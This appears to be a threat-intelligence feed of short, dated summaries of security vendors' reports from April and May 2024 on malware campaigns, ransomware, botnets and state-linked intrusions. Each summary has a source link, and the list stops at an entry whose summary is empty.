ASEC researchers have discovered a CHM malware strain in Korea that steals user information. This malware has been distributed in various formats such as LNK, DOC, and OneNote for some time.
Source: https://asec.ahnlab.com/en/65245/
2024-05-08
Asynchronous_Remote_Access_Trojan
LOW
Intel Name:
Asynchronous_Remote_Access_Trojan
Date of Scan:
2024-05-08
Impact:
LOW
Summary:
McAfee Labs has uncovered a highly sophisticated malware variant designed to steal confidential data. The malware is hard to detect because it uses different kinds of files, such as PowerShell and VBScript, hidden inside an HTML file. When someone opens an infected email and clicks on a link, it starts a chain that downloads these harmful files onto their computer without their knowledge. Once on the system, it can do a lot of damage.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-spam-to-asyncrat-tracking-the-surge-in-non-pe-cyber-threats/
2024-05-08
A_ransomware_affiliated_with_LockBit_Black_malware
MEDIUM
Intel Source:
Threatdown
Intel Name:
A_ransomware_affiliated_with_LockBit_Black_malware
Date of Scan:
2024-05-08
Impact:
MEDIUM
Summary:
Lure emails from a malicious campaign were observed last month, delivering ransomware connected to LockBit Black (aka LockBit 3.0). This LockBit Black malware sample was spread by a malspam campaign using the Phorpiex botnet. The email, with the subject "Your Document", contains a zipped attachment.
Source: https://www.threatdown.com/blog/lockbitblack-05-01-2024/
2024-05-07
Targeted_Malware_Threatens_South_Korean_Users_via_Shortcut_Files
LOW
Intel Source:
ASEC
Intel Name:
Targeted_Malware_Threatens_South_Korean_Users_via_Shortcut_Files
Date of Scan:
2024-05-07
Impact:
LOW
Summary:
ASEC researchers have issued a warning regarding the continuous distribution of malicious shortcut files (*.LNK) disseminating backdoor-type malware, particularly targeting South Korean users, especially those associated with North Korea. The malware, resembling previous RokRAT incidents, disguises itself within legitimate document files and executes PowerShell commands upon activation. Upon execution, it creates and executes additional files, facilitating the transmission of collected information to threat actors' cloud servers.
Source: https://asec.ahnlab.com/en/65076/
2024-05-07
Sophisticated_Cyberattack_Targeting_MITRE_NERVE_Network
HIGH
Intel Source:
MITRE-Engenuity
Intel Name:
Sophisticated_Cyberattack_Targeting_MITRE_NERVE_Network
Date of Scan:
2024-05-07
Impact:
HIGH
Summary:
A recent cyberattack on MITRE's NERVE network, likely orchestrated by a China-linked cyberespionage group, UNC5221, exploited zero-day vulnerabilities in Ivanti Connect Secure VPN devices. The attackers gained access on December 31, 2023, deploying malicious payloads to establish control and exfiltrate data by January 19, 2024. The detection happened in April, but it affected multiple organizations. As a result, MITRE shared technical information and indicators of compromise (IoCs) for mitigation. The significance of timely patch management and proactive cybersecurity procedures in thwarting sophisticated attacks is highlighted by this incident.
Source: https://medium.com/mitre-engenuity/technical-deep-dive-understanding-the-anatomy-of-a-cyber-intrusion-080bddc679f3
2024-05-07
Updates_on_HijackLoader
LOW
Intel Source:
Zscaler
Intel Name:
Updates_on_HijackLoader
Date of Scan:
2024-05-07
Impact:
LOW
Summary:
Researchers at Zscaler have tracked updates to HijackLoader and have produced a Python script that extracts malware modules and configuration from HijackLoader samples. They also examine the malware families that HijackLoader delivered between March 2024 and April 2024.
Source: https://www.zscaler.com/blogs/security-research/hijackloader-updates#indicators-of-compromise--iocs-
2024-05-06
The_new_MaaS_Loader
LOW
Intel Source:
Esentire
Intel Name:
The_new_MaaS_Loader
Date of Scan:
2024-05-06
Impact:
LOW
Summary:
Last month, eSentire's Threat Response analysts observed multiple D3F@ck Loader infections being spread via Google Ads. This new loader, first seen in January 2024, is capable of bypassing several key security features, such as Google Chrome and Edge protections, Windows Defender alerts, and SmartScreen.
Source: https://www.esentire.com/blog/d3f-ck-loader-the-new-maas-loader
2024-05-06
North_Korean_actors_exploit_weak_DMARC_Security_Policies
MEDIUM
Intel Source:
IC3
Intel Name:
North_Korean_actors_exploit_weak_DMARC_Security_Policies
Date of Scan:
2024-05-06
Impact:
MEDIUM
Summary:
The FBI and the NSA are jointly issuing this advisory to highlight attempts by Democratic People's Republic of Korea (DPRK, a.k.a. North Korea) Kimsuky cyber actors to exploit improperly configured DNS Domain-based Message Authentication, Reporting and Conformance (DMARC) record policies to conceal social engineering attempts.
Source: https://www.ic3.gov/Media/News/2024/240502.pdf
2024-05-06
A_new_Mal_Metrica_redirect_scam
LOW
Intel Source:
Sucuri
Intel Name:
A_new_Mal_Metrica_redirect_scam
Date of Scan:
2024-05-06
Impact:
LOW
Summary:
Recently, a Sucuri analyst discovered a new Mal.Metrica redirect scam on compromised websites. The analysts advise web users to be very careful about what they click on and to be wary of anything suspicious that pops up in their browser, even if it comes from a website they would otherwise trust. When visiting an infected website, users are presented with a fake human verification prompt.
Source: https://blog.sucuri.net/2024/05/mal-metrica-redirects-users-to-scam-sites.html
2024-05-06
Keylogger_Malware_Spreads_via_Fake_Revenue_Agency
LOW
Intel Source:
CERT-AGID
Intel Name:
Keylogger_Malware_Spreads_via_Fake_Revenue_Agency
Date of Scan:
2024-05-06
Impact:
LOW
Summary:
CERT-AGID researchers have discovered a sophisticated fraud attempt employing a fake Internal Revenue Agency page, hosted on a compromised Italian domain, intended to infect victims with keylogger malware. Visiting the page immediately downloads a zipped file called "MODULO_RIMBORSO_AGENZIA_ENTRATE.PDF.ZIP", which contains an executable developed in VB6. This file is responsible for downloading an additional component from Altervista over FTP, which is also written in VB6 and includes keylogger capability, hence the name VBLogger.
Source: https://cert-agid.gov.it/news/malware/diffusione-di-malware-keylogger-tramite-falsa-pagina-di-agenzia-delle-entrate-puntofisco/
2024-05-06
Malicious_ads_and_modals_target_corporate_users
MEDIUM
Intel Source:
Threatdown
Intel Name:
Malicious_ads_and_modals_target_corporate_users
Date of Scan:
2024-05-06
Impact:
MEDIUM
Summary:
Threatdown analysts discuss in their blog a new campaign targeting corporate users through malicious ads and modals. The threat actors have created fake websites impersonating well-known brands and products used in the corporate world. The attack is initiated through Google ads, redirecting users to a cloaking service and then to a final URL where a modal appears, prompting users to download a supposed browser extension.
Source: https://www.threatdown.com/blog/corporate-users-targeted-via-malicious-ads-and-modals/
2024-05-06
The_observation_of_a_large_scale_credential_stuffing_attack
LOW
Intel Source:
Permiso
Intel Name:
The_observation_of_a_large_scale_credential_stuffing_attack
Date of Scan:
2024-05-06
Impact:
LOW
Summary:
Permiso analysts discuss a recent credential stuffing attack observed by Okta on April 26, 2024, which targeted VPN devices. The attack shifted to password spraying against Okta clients on April 19 and was not very successful. The majority of attempts came from residential proxies and TOR, and Permiso recommends reviewing user.session.start events for successful authentication.
Source: https://permiso.io/blog/latest-okta-credential-stuffing-campaign
2024-05-03
A_family_of_voice_phishing_apps_distributed_in_South_Korea
LOW
Intel Source:
Medium
Intel Name:
A_family_of_voice_phishing_apps_distributed_in_South_Korea
Date of Scan:
2024-05-03
Impact:
LOW
Summary:
Voice phishing groups in South Korea build phishing pages and apps like SecretCalls to trick victims into installing malware and accessing phishing sites for financial fraud. Detailed analysis of SecretCalls Loader reveals anti-analysis techniques like DEX encryption, emulator detection, and installing additional apps before loading SecretCalls for remote control.
Source: https://medium.com/s2wblog/secretcalls-spotlight-a-formidable-app-of-notorious-korean-financial-fraudster-part-1-fa4bbed855c0
2024-05-03
macOS_Adload_new_samples
LOW
Intel Source:
SentinelOne
Intel Name:
macOS_Adload_new_samples
Date of Scan:
2024-05-03
Impact:
LOW
Summary:
Researchers from SentinelOne observed a new variant of the Adload adware that evades Apple's recent XProtect malware signature updates. Despite Apple adding 74 new rules targeting Adload in XProtect version 2192, the adware authors have rapidly modified their code to bypass these detections. The report examines a specific 4.55MB Intel x86_64 dropper sample that employs Go language components and connects to hardcoded domains for retrieving next-stage payloads. While undetected by most antivirus engines on VirusTotal, SentinelOne's multi-engine platform effectively identifies and blocks this Adload variant.
Source: https://www.sentinelone.com/blog/macos-adload-prolific-adware-pivots-just-days-after-apples-xprotect-clampdown/
2024-05-03
A_previously_undetected_malicious_Mach_O_binary_programmed_malware_Cuckoo
LOW
Intel Source:
Kandji
Intel Name:
A_previously_undetected_malicious_Mach_O_binary_programmed_malware_Cuckoo
Date of Scan:
2024-05-03
Impact:
LOW
Summary:
On April 24, 2024, Kandji analysts found a previously undetected malicious Mach-O binary programmed to behave like a cross between spyware and an infostealer. They named the malware Cuckoo, after the bird that lays its eggs in the nests of other birds and steals the host's resources for the gain of its young.
Source: https://blog.kandji.io/malware-cuckoo-infostealer-spyware
2024-05-03
An_increasing_number_of_cyber_attacks_with_the_use_of_the_Microsoft_Graph_API
LOW
Intel Source:
Symantec
Intel Name:
An_increasing_number_of_cyber_attacks_with_the_use_of_the_Microsoft_Graph_API
Date of Scan:
2024-05-03
Impact:
LOW
Summary:
An increasing number of cyber threats have adopted the use of the Microsoft Graph API to facilitate covert communications with command-and-control infrastructure hosted on Microsoft cloud services. This technique helps attackers blend in with legitimate traffic to cloud platforms and obtain infrastructure at a low cost.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/graph-api-threats
2024-05-03
The_danger_of_internet_facing_routers
MEDIUM
Intel Source:
Trend Micro
Intel Name:
The_danger_of_internet_facing_routers
Date of Scan:
2024-05-03
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have observed cybercriminals and nation-state actors collaborating in the exploitation of compromised networks, as seen in a botnet of Ubiquiti EdgeRouter devices that had already been disrupted by the FBI. Hundreds of Ubiquiti EdgeRouters were used for different purposes, such as brute forcing, pharmaceutical spam, employing server message block (SMB) reflectors in NTLMv2 hash relay attacks, proxying stolen credentials on phishing sites, and sending spear-phishing e-mails. Apart from EdgeRouters, the botnet also included compromised Raspberry Pi and other internet-facing devices.
Source: https://www.trendmicro.com/en_us/research/24/e/router-roulette.html
2024-05-03
Hackers_With_Iranian_State_Support_Are_Still_Posing_as_Think_Tanks_and_Media_Outlets
MEDIUM
Intel Source:
Google-owned Mandiant
Intel Name:
Hackers_With_Iranian_State_Support_Are_Still_Posing_as_Think_Tanks_and_Media_Outlets
Date of Scan:
2024-05-03
Impact:
MEDIUM
Summary:
Google-owned Mandiant researchers have discovered that the Iranian state-sponsored hacker group APT42 is posing as well-known news organizations and think tanks in order to target journalists. The hackers used the identities of The Washington Post, The Economist, and The Jerusalem Post in an ongoing campaign that began in 2021 to obtain login credentials from anyone who clicked on fictitious website links.
Source: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
2024-05-02
TargetCompany_Ransomware_Group_Expands_Tactics_with_Mallox_Ransomware
MEDIUM
Intel Source:
ASEC
Intel Name:
TargetCompany_Ransomware_Group_Expands_Tactics_with_Mallox_Ransomware
Date of Scan:
2024-05-02
Impact:
MEDIUM
Summary:
ASEC researchers have uncovered a persistent threat posed by the TargetCompany ransomware group, which has been expanding its tactics to target MS-SQL servers. Employing brute force and dictionary attacks, the group installs the Remcos RAT to gain control over systems, followed by the deployment of remote screen control malware. Recently, they attempted to encrypt systems with the Mallox ransomware.
Source: https://asec.ahnlab.com/en/64921/
2024-05-02
Latrodectus_Malware
LOW
Intel Source:
Cryptolaemus Group
Intel Name:
Latrodectus_Malware
Date of Scan:
2024-05-02
Impact:
LOW
Summary:
Latrodectus malware, also known as Unidentified 111 and IceNova, is now being employed in phishing campaigns that exploit Microsoft Azure and Cloudflare themes to bypass email security systems. Initially identified by Walmart's security team and later analyzed by ProofPoint and Team Cymru, this Windows malware downloader functions as a backdoor to download additional payloads or execute commands. Although it is unclear whether Latrodectus will replace the IcedID malware loader, its usage in phishing and contact form spam is on the rise, aimed at infiltrating corporate networks. These phishing attempts often start with reply-chain emails containing malicious PDFs or URLs that mimic legitimate Azure-hosted documents, leading to a deceptive Cloudflare captcha designed to thwart automated security scans and ensure payloads are delivered only to actual users. Upon solving this captcha, a JavaScript file—disguised as a document—downloads an MSI file, which installs a DLL via rundll32.exe into the user’s system, enabling Latrodectus to execute quietly in the background. The malware's potential to drop other malicious software, such as Lumma information-stealer and Danabot, underscores the urgency for infected systems to be isolated and assessed for unusual network activity.
Source: https://github.com/pr0xylife/Latrodectus/blob/main/Latrodectus_29.04.2024.txt
2024-05-02
JavaScript_Based_Web_Skimmers_From_Legitimate_Websites
LOW
Intel Source:
Palo Alto
Intel Name:
JavaScript_Based_Web_Skimmers_From_Legitimate_Websites
Date of Scan:
2024-05-02
Impact:
LOW
Summary:
Palo Alto researchers have found several seemingly legitimate websites hosting JavaScript-based web skimmers.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-04-30-examples-of-web-skimmers.txt
2024-05-02
A_Decade_Old_Flaw_Allows_New_Goldoon_Botnet_to_Target_D_Link_Routers
MEDIUM
Intel Source:
Fortinet
Intel Name:
A_Decade_Old_Flaw_Allows_New_Goldoon_Botnet_to_Target_D_Link_Routers
Date of Scan:
2024-05-02
Impact:
MEDIUM
Summary:
Fortinet researchers have discovered a new botnet that exploits CVE-2015-2051, a D-Link vulnerability that dates back over ten years. Due to this issue, remote attackers can use the GetDeviceSettings action on the HNAP interface to carry out arbitrary actions: an attacker can craft an HTTP request and include a malicious command in the header.
Source: https://www.fortinet.com/blog/threat-research/new-goldoon-botnet-targeting-d-link-devices
2024-05-02
Scaly_Wolf_new_loader
LOW
Intel Source:
Bi.Zone
Intel Name:
Scaly_Wolf_new_loader
Date of Scan:
2024-05-02
Impact:
LOW
Summary:
BI.ZONE threat intelligence analysts discovered a new campaign by Scaly Wolf, a threat group that attacks Russian and Belarusian companies. The group uses phishing emails disguised as communications from government agencies, containing legitimate documents and password-protected archives with malicious executable files. The executable is a loader that injects the White Snake stealer into the explorer.exe process, avoiding detection through anti-virtualization checks and direct kernel calls instead of WinAPI. The White Snake malware collects credentials and sensitive data from compromised systems.
Source: https://bi-zone.medium.com/scaly-wolfs-new-loader-the-right-tool-for-the-wrong-job-0b36d4c20c88
2024-05-02
Tactics_of_a_Sophisticated_Ransomware_Campaign
MEDIUM
Intel Source:
Huntress
Intel Name:
Tactics_of_a_Sophisticated_Ransomware_Campaign
Date of Scan:
2024-05-02
Impact:
MEDIUM
Summary:
Huntress researchers delve into a sophisticated ransomware attack orchestrated by a threat actor with intimate knowledge of the targeted infrastructure. The attacker's adeptness at disabling security tools, terminating security applications, and using various tools for malicious purposes highlights their advanced capabilities. Through detailed investigation and proactive monitoring, Huntress identified a consistent pattern of activity across multiple endpoints, enabling timely intervention to prevent ransomware deployment.
Source: https://www.huntress.com/blog/lolbin-to-inc-ransomware
2024-05-02
Zloader_Learns_Old_Tricks
LOW
Intel Source:
Zscaler
Intel Name:
Zloader_Learns_Old_Tricks
Date of Scan:
2024-05-02
Impact:
LOW
Summary:
Zloader, also known as Terdot, DELoader, or Silent Night, is a modular trojan derived from the leaked ZeuS source code, first identified in 2015. After nearly two years of dormancy, Zloader resurfaced around September 2023 with updated obfuscation techniques, a revised domain generation algorithm, and enhanced network communication protocols. The latest version, 2.4.1.0, marks the reintroduction of an anti-analysis feature reminiscent of the original ZeuS 2.x code, which restricts the trojan’s execution to the initially infected machine. This blog post examines how this feature, previously abandoned by subsequent variants, has been re-implemented in Zloader to prevent analysis and detection by confining execution to original host machines.
Source: https://www.zscaler.com/blogs/security-research/zloader-learns-old-tricks
2024-05-02
A_novel_backdoor_Kapeka
MEDIUM
Intel Source:
Labs.WithSecure
Intel Name:
A_novel_backdoor_Kapeka
Date of Scan:
2024-05-02
Impact:
MEDIUM
Summary:
WithSecure has published research about a backdoor called "Kapeka," tracked by Microsoft as "KnuckleTouch," used in attacks in Eastern Europe since mid-2022. Kapeka functions as a versatile backdoor, providing both initial toolkit capabilities and long-term access to victims. Its sophistication suggests involvement by an APT group. WithSecure links Kapeka to Sandworm, tracked by Microsoft as Seashell Blizzard, a notorious Russian nation-state threat group associated with the GRU known for destructive attacks in Ukraine.
Source: https://labs.withsecure.com/publications/kapeka
2024-05-02
Millions_of_Malicious_Repositories_Planted_on_Docker_Hub
MEDIUM
Intel Source:
JFrog
Intel Name:
Millions_of_Malicious_Repositories_Planted_on_Docker_Hub
Date of Scan:
2024-05-02
Impact:
MEDIUM
Summary:
JFrog researchers have discovered multiple large-scale malware campaigns targeting Docker Hub, in which millions of imageless repositories with malicious metadata have been planted. According to the researchers, of the 4.6M repositories on Docker Hub, 2.81M were linked to these campaigns. Three main malware campaigns were running on Docker Hub: the "Downloader" and "eBook Phishing" campaigns create fake repositories in batches over a short time period, while the "Website SEO" campaign creates a few repositories daily over the whole time frame and uses a single user per repository.
Source: https://jfrog.com/blog/attacks-on-docker-with-millions-of-malicious-repositories-spread-malware-and-phishing-scams/
2024-05-01
Cuttlefish_Malware
MEDIUM
Intel Source:
Lumen
Intel Name:
Cuttlefish_Malware
Date of Scan:
2024-05-01
Impact:
MEDIUM
Summary:
The Black Lotus Labs team at Lumen Technologies has identified a malware platform called Cuttlefish, targeting enterprise-grade SOHO routers. Cuttlefish, active since at least July 2023 with significant activity from October 2023 to April 2024, is a modular malware aimed at stealing authentication data from web requests passing through compromised routers and can perform DNS and HTTP hijacking on internal network communications. Notably, this malware shares code with HiatusRat, linked to the People's Republic of China, though they do not share victim profiles and appear to operate independently. Cuttlefish utilizes a zero-click strategy to capture data, employing packet sniffers designed to target public cloud services and creating proxies or VPN tunnels for data exfiltration, thus evading detection by using stolen credentials. The majority of infections, about 99%, were concentrated in Turkey, primarily via two telecom providers, affecting 600 unique IP addresses, with minimal impact outside Turkey, including some global satellite phone providers and a potential US-based datacenter.
Source: https://blog.lumen.com/eight-arms-to-hold-you-the-cuttlefish-malware/
2024-05-01
A_Sophisticated_DNS_Centric_Operation_Linked_to_Chinese_Nation_State_Activity
MEDIUM
Intel Source:
Infoblox
Intel Name:
A_Sophisticated_DNS_Centric_Operation_Linked_to_Chinese_Nation_State_Activity
Date of Scan:
2024-05-01
Impact:
MEDIUM
Summary:
Researchers from Infoblox present a groundbreaking study on Muddling Meerkat, a sophisticated actor believed to be a Chinese nation-state entity, conducting extensive operations through DNS queries. The operations, which began around October 2019, involve the use of Chinese IP space, manipulation of the Great Firewall, and the creation of false MX records. Despite resembling DNS DDoS attacks, the true motivations behind Muddling Meerkat's activities remain elusive. The research underscores the actor's expertise in DNS manipulation and highlights the challenges in detecting and attributing such complex cyber threats.
Source: https://blogs.infoblox.com/threat-intelligence/a-cunning-operator-muddling-meerkat-and-chinas-great-firewall/
2024-04-30
Dark_Gate_Malware
MEDIUM
Intel Source:
McAfee
Intel Name:
Dark_Gate_Malware
Date of Scan:
2024-04-30
Impact:
MEDIUM
Summary:
McAfee Labs has discovered a novel infection chain associated with DarkGate malware. This chain initiates with an HTML-based entry point and advances to exploit the AutoHotkey utility in subsequent stages. DarkGate, identified as a Remote Access Trojan (RAT) and offered as Malware-as-a-Service (MaaS) on a Russian-language cybercrime forum since 2018, harbors a range of malicious functionalities including process injection, file download, and keylogging capabilities. Over the past three months, DarkGate's spread has been observed.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen/
2024-04-30
IcedID_Malware_distributing_through_Phishing_Campaign
MEDIUM
Intel Source:
The DFIR Report
Intel Name:
IcedID_Malware_distributing_through_Phishing_Campaign
Date of Scan:
2024-04-30
Impact:
MEDIUM
Summary:
Researchers from The DFIR Report analyzed an intrusion in which IcedID malware was distributed through a fraudulent Azure download portal, followed by the deployment of a Cobalt Strike beacon. The threat actor established persistence, conducted extensive discovery activities, and initiated lateral movement within the network. They targeted file shares, escalated privileges, and exfiltrated data to AWS S3 buckets. The actor expanded their foothold, explored virtualization infrastructure, and accessed critical administrative utilities. Ultimately, they deployed ransomware across the domain, resulting in significant disruption after a prolonged 684-hour operation.
Source: https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/
2024-04-29
A_New_Ongoing_Attack_Campaign_DEV_POPPER
MEDIUM
Intel Source:
Securonix Threat Labs
Intel Name:
A_New_Ongoing_Attack_Campaign_DEV_POPPER
Date of Scan:
2024-04-29
Impact:
MEDIUM
Summary:
Securonix researchers have identified a new social engineering attack campaign in which the attacker lures software developers through fake job interviews to deliver a Python-based RAT. Securonix has named this campaign DEV#POPPER. The campaign is likely associated with a North Korean threat actor.
Source: https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/
2024-04-29
Malware_Campaign_Attempts_Abuse_of_Defender_Binaries
LOW
Intel Source:
Sophos
Intel Name:
Malware_Campaign_Attempts_Abuse_of_Defender_Binaries
Date of Scan:
2024-04-29
Impact:
LOW
Summary:
Researchers at Sophos have examined a ransomware campaign that modifies the original content of legitimate Sophos executables and DLLs, replaces the entry-point code, and inserts the decrypted payload as a resource.
Source: https://news.sophos.com/en-us/2024/04/26/malware-campaign-abuses-legit-defender-binaries/
2024-04-29
A_new_malware_FakeBat_Distributing_Through_Fake_Browser_Updates
LOW
Intel Source:
Esentire
Intel Name:
A_new_malware_FakeBat_Distributing_Through_Fake_Browser_Updates
Date of Scan:
2024-04-29
Impact:
LOW
Summary:
Researchers at eSentire’s Threat Response Unit have observed a new malware campaign, the FakeBat loader, which is being delivered through compromised websites. These websites host malicious JavaScript that generates fake browser update notifications, misleading users into believing they need to install a legitimate browser update.
Source: https://www.esentire.com/blog/fakebat-malware-distributing-via-fake-browser-updates
2024-04-29
Anomalies_Following_Disassembly_of_LockBit_Ransomware
HIGH
Intel Source:
CERT-AGID
Intel Name:
Anomalies_Following_Disassembly_of_LockBit_Ransomware
Date of Scan:
2024-04-29
Impact:
HIGH
Summary:
During Operation Cronos in February, an international coalition of law enforcement agencies, headed by the National Crime Agency (NCA), took down the LockBit ransomware's activities and infrastructure. The NoMoreRansom project portal offers tools to recover files encrypted by the LockBit ransomware. It is therefore notable that for the past two days, various European nations, including Italy, have been the target of a large operation distributing the LockBit 3.0 (LockBit Black) ransomware. The email, written in English, is sent indiscriminately to both public and private entities with the subject line "documents." An SCR executable is contained in a ZIP file attached to the email.
Source: https://cert-agid.gov.it/news/ransomware-lockbit-anomalie-dopo-lo-smantellamento/
2024-04-29
Unveiling_The_Tactics_and_Techniques_of_KageNoHitobito_and_DoNex_Ransomware
MEDIUM
Intel Source:
Fortinet
Intel Name:
Unveiling_The_Tactics_and_Techniques_of_KageNoHitobito_and_DoNex_Ransomware
Date of Scan:
2024-04-29
Impact:
MEDIUM
Summary:
Researchers from Fortinet have identified two ransomware variants, KageNoHitobito and DoNex. KageNoHitobito encrypts files on a machine and demands payment to decrypt them. It uses the Tor browser to communicate with victims. It only encrypts files on the local computer, not on other connected devices. The encrypted files receive a "hitobito" extension. DoNex also encrypts files, but does so on both the local machine and connected devices. It alters file extensions by appending a victim ID and changes the files' icons after encryption.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-keganohitobito-and-donex
2024-04-29
Uncorking_Old_Wine
LOW
Intel Source:
Deep Instinct
Intel Name:
Uncorking_Old_Wine
Date of Scan:
2024-04-29
Impact:
LOW
Summary:
Deep Instinct researchers have unearthed a sophisticated cyber operation targeting Ukraine, leveraging CVE-2017-8570 and a custom loader for Cobalt Strike Beacon. The attack employs a blend of evasion techniques, including obfuscation, anti-analysis methods, and disguised domain names. Despite its complexity, researchers' proactive detection capabilities thwarted the attack on day zero, emphasizing the importance of robust cybersecurity measures.
Source: https://www.deepinstinct.com/blog/uncorking-old-wine-zero-day-cobalt-strike-loader
2024-04-29
Agent_Tesla_Targeting_US_Education_and_Govt_Entities
MEDIUM
Intel Source:
Veriti
Intel Name:
Agent_Tesla_Targeting_US_Education_and_Govt_Entities
Date of Scan:
2024-04-29
Impact:
MEDIUM
Summary:
Researchers at Veriti have noticed a fresh wave of cyberattacks focusing on sensitive data held by the US government and educational institutions. The campaign combines two malware variants, Agent Tesla and Taskun. Taskun is the ideal accomplice to Agent Tesla's malicious activities: it undermines the integrity of a system and opens a backdoor that allows Agent Tesla to enter and establish persistence. This strengthens Agent Tesla's hold on the system and maximizes data theft by enabling it to remain undetected for protracted periods of time.
Source: https://veriti.ai/blog/veriti-research/agent-tesla-campaign-targets-us-education-and-government-sectors/
2024-04-26
Cyberattacks_Affecting_Cisco_ASA_VPNs
MEDIUM
Intel Source:
Canada CA
Intel Name:
Cyberattacks_Affecting_Cisco_ASA_VPNs
Date of Scan:
2024-04-26
Impact:
MEDIUM
Summary:
The Australian Cyber Security Centre of the Signals Directorate, the Canadian Centre for Cyber Security (Cyber Centre), and the National Cyber Security Centre (NCSC) of the United Kingdom have been assessing persistent hostile cyber activity since the beginning of 2024. This activity has been directed towards virtual private network (VPN) services that are utilized by critical national infrastructure networks and government agencies worldwide. The capabilities point to espionage carried out by a highly skilled and resourceful state-sponsored operator.
Source: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
2024-04-26
The_Path_of_an_Obfuscated_Batch_Script_to_Monero_Mining
LOW
Intel Source:
CYFIRMA Research
Intel Name:
The_Path_of_an_Obfuscated_Batch_Script_to_Monero_Mining
Date of Scan:
2024-04-26
Impact:
LOW
Summary:
Researchers from CYFIRMA have discovered a stealthy miner malware present in the wild. To defeat defensive controls, this malicious software uses advanced methods such as privilege escalation, process injection, and AMSI bypass. The malware notably includes a number of anti-analysis and anti-debugging techniques.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_cyfirma-obfuscated-batch-scripts-journey-activity-7189564988137656320-VNWN?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
2024-04-26
Unveiling_the_macOS_Variant_of_LightSpy_Malware
LOW
Intel Source:
Huntress
Intel Name:
Unveiling_the_macOS_Variant_of_LightSpy_Malware
Date of Scan:
2024-04-26
Impact:
LOW
Summary:
Huntress researchers have observed the emergence of LightSpy targeting macOS, which highlights the evolving landscape of threats against Apple devices. While recent samples uploaded to VirusTotal from India provide some insight, caution is advised in drawing definitive conclusions without additional evidence of active campaigns or specific targeting. Although previous research has linked LightSpy to APT41, attribution remains complex. Apple's proactive security measures, such as Lockdown Mode and enhanced XProtect modules, underscore the importance of regular updates across all platforms to mitigate emerging threats effectively.
Source: https://www.huntress.com/blog/lightspy-malware-variant-targeting-macos
2024-04-26
A_Malware_Campaign_Targeting_WP_Automatic_Plugin
LOW
Intel Source:
WPScan
Intel Name:
A_Malware_Campaign_Targeting_WP_Automatic_Plugin
Date of Scan:
2024-04-26
Impact:
LOW
Summary:
Researchers from WPScan have discovered a dangerous malware campaign targeting websites that use the WP-Automatic plugin. The campaign exploits a critical vulnerability in versions of the plugin prior to 3.9.2.0, allowing attackers to execute unauthorized database queries via SQL injection (SQLi). This flaw poses a significant risk as attackers can gain admin-level access, upload malicious files, and potentially take control of affected websites.
Source: https://wpscan.com/blog/new-malware-campaign-targets-wp-automatic-plugin/
2024-04-26
New_Variant_of_IDAT_Loader
LOW
Intel Source:
Morphisec
Intel Name:
New_Variant_of_IDAT_Loader
Date of Scan:
2024-04-26
Impact:
LOW
Summary:
Researchers at Morphisec have identified a new variant of IDAT loader, which is utilized to distribute various malware payloads depending on the attacker's analysis of the targeted system. IDAT incorporates distinctive functionalities such as code injection and execution modules, distinguishing it from traditional loaders.
Source: https://blog.morphisec.com/threat-bulletin-new-variant-idat-variant
2024-04-26
Sinkholing_the_PlugX_USB_Worm_Botnet_by_Unplugging_PlugX
MEDIUM
Intel Source:
Sekoia
Intel Name:
Sinkholing_the_PlugX_USB_Worm_Botnet_by_Unplugging_PlugX
Date of Scan:
2024-04-26
Impact:
MEDIUM
Summary:
Researchers have sinkholed a command and control server for a variant of the PlugX malware and observed in six months more than 2.5 million connections from unique IP addresses. Since last September, the sinkhole server received over 90,000 requests every day from infected hosts in more than 170 countries.
Source: https://blog.sekoia.io/unplugging-plugx-sinkholing-the-plugx-usb-worm-botnet/#h-indicators-of-compromise
2024-04-25
An_Investigation_of_Ongoing_FROZEN_SHADOW_Attack_Campaign
MEDIUM
Intel Source:
Securonix Threat Labs
Intel Name:
An_Investigation_of_Ongoing_FROZEN_SHADOW_Attack_Campaign
Date of Scan:
2024-04-25
Impact:
MEDIUM
Summary:
Securonix researchers discovered an interesting attack campaign that uses SSLoad malware and Cobalt Strike implants, allowing the attackers to pivot and seize control of the entire network domain. Securonix has dubbed the campaign FROZEN#SHADOW. The campaign also makes use of the ConnectWise ScreenConnect remote desktop software.
Source: https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/
2024-04-25
ArcaneDoor_Unmasked
LOW
Intel Source:
Cisco Talos
Intel Name:
ArcaneDoor_Unmasked
Date of Scan:
2024-04-25
Impact:
LOW
Summary:
Cisco Talos researchers have discovered a campaign called "ArcaneDoor" aimed at perimeter network devices from multiple vendors. These devices are critical because they control how data enters and leaves networks. The campaign is run by a skilled group, tracked by Talos as UAT4356, which uses custom tools called "Line Runner" and "Line Dancer" to modify device configuration and spy on network traffic.
Source: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
2024-04-25
Examining_How_Iptables_Configuration_Affects_Honeypot_Data
LOW
Intel Source:
ISC.SANS
Intel Name:
Examining_How_Iptables_Configuration_Affects_Honeypot_Data
Date of Scan:
2024-04-25
Impact:
LOW
Summary:
ISC.SANS researchers have investigated the impact of iptables settings on a honeypot's effectiveness in detecting and evaluating malicious activity. Through a comparative examination of honeypot data, the researchers show how the absence of iptables might reduce the attack surface, resulting in missed opportunities to identify malware and other malicious behavior. The results highlight how crucial iptables is for managing network traffic and how crucial its configuration is for boosting security and facilitating in-depth threat analysis.
Source: https://isc.sans.edu/diary/Does+it+matter+if+iptables+isnt+running+on+my+honeypot/30862/
2024-04-25
The_Ransomware_Evolution
LOW
Intel Source:
SentinelOne
Intel Name:
The_Ransomware_Evolution
Date of Scan:
2024-04-25
Impact:
LOW
Summary:
